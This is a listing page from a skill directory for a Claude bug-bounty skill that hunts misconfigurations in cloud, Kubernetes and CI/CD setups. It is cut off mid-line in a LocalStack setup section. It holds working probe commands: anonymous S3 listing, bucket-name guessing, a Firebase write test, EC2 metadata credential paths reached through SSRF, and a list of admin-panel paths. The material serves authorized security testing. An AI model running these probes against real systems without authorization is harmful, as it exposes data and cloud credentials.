← ClaudeAtlas

hunt-cloud-misconfiglisted

Hunt cloud / infrastructure misconfigurations. AWS: public S3 buckets (s3:GetObject anonymous), permissive bucket policies (PutObjectAcl public-write), exposed CloudFront origin, public Lambda function URL, public RDS snapshot, IAM credentials in JS bundles, AWS metadata accessible via SSRF. GCP: public GCS buckets, exposed Cloud Run services, leaked service account JSON. Azure: public blob containers, exposed Function App. K8s: kubelet 10250 unauth, etcd 2379, dashboard public, services API public, pod metadata service. CI/CD: Jenkins /script console, GitLab Runner registration token, GitHub Actions workflow with pull_request_target injection. Container: Docker daemon 2375, Kubernetes API anonymous. Detection: targeted dorking, certificate transparency, JS bundle secret extraction, port scan for known service ports. Validate: actual data read / write / RCE. Use when hunting cloud-native attack surface.
elementalsouls/Claude-BugHunter · ★ 1,478 · DevOps & Infrastructure · score 83
Install: claude install-skill elementalsouls/Claude-BugHunter
## 16. CLOUD / INFRA MISCONFIGS ### S3 / GCS / Azure Blob ```bash # S3 listing curl -s "https://TARGET-NAME.s3.amazonaws.com/?max-keys=10" aws s3 ls s3://target-bucket-name --no-sign-request # Try common bucket names for name in target target-backup target-assets target-prod target-staging; do curl -s -o /dev/null -w "$name: %{http_code}\n" "https://$name.s3.amazonaws.com/" done # Firebase open rules curl -s "https://TARGET-APP.firebaseio.com/.json" # read curl -s -X PUT "https://TARGET-APP.firebaseio.com/test.json" -d '"pwned"' # write ``` ### EC2 Metadata (via SSRF) ```bash http://169.254.169.254/latest/meta-data/iam/security-credentials/ # role name http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME # keys ``` ### Exposed Admin Panels ``` /jenkins /grafana /kibana /elasticsearch /swagger-ui.html /phpMyAdmin /.env /config.json /api-docs /server-status ``` --- ## Local-verification toolchain For testing cloud-misconfig findings against a local AWS sim before/instead of hitting real cloud: ```bash # LocalStack 3.0 community (pin the version — 4.x requires a Pro license) docker run -d --name lab-localstack -p 14566:4566 localstack/localstack:3.0 # awscli ≥ 2.30 + LocalStack 3.0 incompatibility workaround (x-amz-trailer header): export AWS_REQUEST_CHECKSUM_CALCULATION=when_required export AWS_RESPONSE_CHECKSUM_VALIDATION=when_required export AWS_ENDPOINT_URL=http://localhost:14566 export AWS_ACCESS_KEY_ID=test AWS_SECRET_ACCESS_K